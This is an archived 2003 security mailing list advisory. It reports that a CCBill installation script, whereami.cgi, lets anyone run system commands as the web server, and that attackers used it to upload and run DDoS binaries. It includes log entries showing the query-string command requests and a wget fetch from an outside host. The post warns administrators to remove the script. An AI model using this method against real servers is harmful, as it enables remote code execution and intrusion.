Type packetstorm
Reporter Dayne Jordan
Modified 2003-07-06T00:00:00


                                            `Date: Thu, 03 Jul 2003 12:46:39 -0400  
From: Dayne Jordan <>  
Subject: Another overflow exploit for Apache? *RESOLVED*  
Greetings again,  
We found that this exploit was NOT a result of an Apache exploit.  
After waiting for the culprits to attempt their mischeif again, we were  
waiting and watched as they re-uploaded their rogue Ddos scripts to /tmp  
and executed thru Apache - not to our surprise, it appears CCBILL once  
again has some very exploitable 'helper' scripts they upload when installing  
their software.  
On ALL the machines with the Ddos behavior we found, there was one common  
script on all of them ' whereami.cgi '. This script, when executed from  
the browser allows system commands to be entered and executed as the web  
server. We even used wget and lynx thru this command interface to upload  
various things into /tmp/. Our culprits were uploading old-school and common  
Ddos binaries, then executing them.. nothing root worthy, but nonetheless  
a pain in the arse.  
Excerpt log entries from our test machines:  
Machine getting it - how we uploaded a test binary: - - [03/Jul/2003:12:00:00 -0400] "POST /ccbill/whereami.cgi?g=ls  
HTTP/1.1" 200 1033 "http://our.test.fileserver/ccbill/whereami.cgi?g=ls"  
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; H010818; T312461)"  
Machine serving it: - - [03/Jul/2003:11:59:59 -0400] "GET /rogue-test.tar HTTP/1.0"  
200 286720 "-" "Wget/1.5.1"  
Other things we did with it: - - [03/Jul/2003:12:44:41 -0400] "GET  
HTTP/1.1" 200 247 "-" "Mozilla/4.0  
(compatible; MSIE 5.5; Windows 98; H010818; T312461)"  
and then...  
su-2.02# ls -la /tmp  
drwxrwxrwt 6 root wheel 3072 Jul 3 12:42 .  
drwxr-xr-x 19 root wheel 512 Mar 17 17:01 ..  
drwxr-xr-x 2 nobody wheel 512 Jul 3 12:44 boo  
srwxrwxrwx 1 mysql wheel 0 Jul 3 00:05 mysql.sock  
And snippet from one of the affected machines running 'hell' a simple  
Ddos binary: - - [01/Jul/2003:16:58:20 -0400] "GET /ccbill/whereami.cgi?g=v/hell  
HTTP/1.1" 200 265 "-" "Mozilla/4.0  
Once you initiate the /whereami.cgi?g=ls command from the browser, you then  
get an input box and an enter button on your browser - execute any command  
you like, including wget, lynx, tar, sh, etc etc.  
This script is most likely used by CCBILL techs as part of their default  
installation so that they can administer/setup their necessary scripts/software. Unfortunately,  
there is a huge hole in this script. We have a customer who very  
recently had CCBILL setup their services on his website and the very same  
'whereami.cgi' exists even on this current date build.  
So in short, those of you who use CCBILL make sure to remove or render  
useless the 'whereami.cgi' script in your /ccbill directory(ies). Across  
all our machines where we know CCBILL exists we've found this script on  
every one so far - and removed it ;)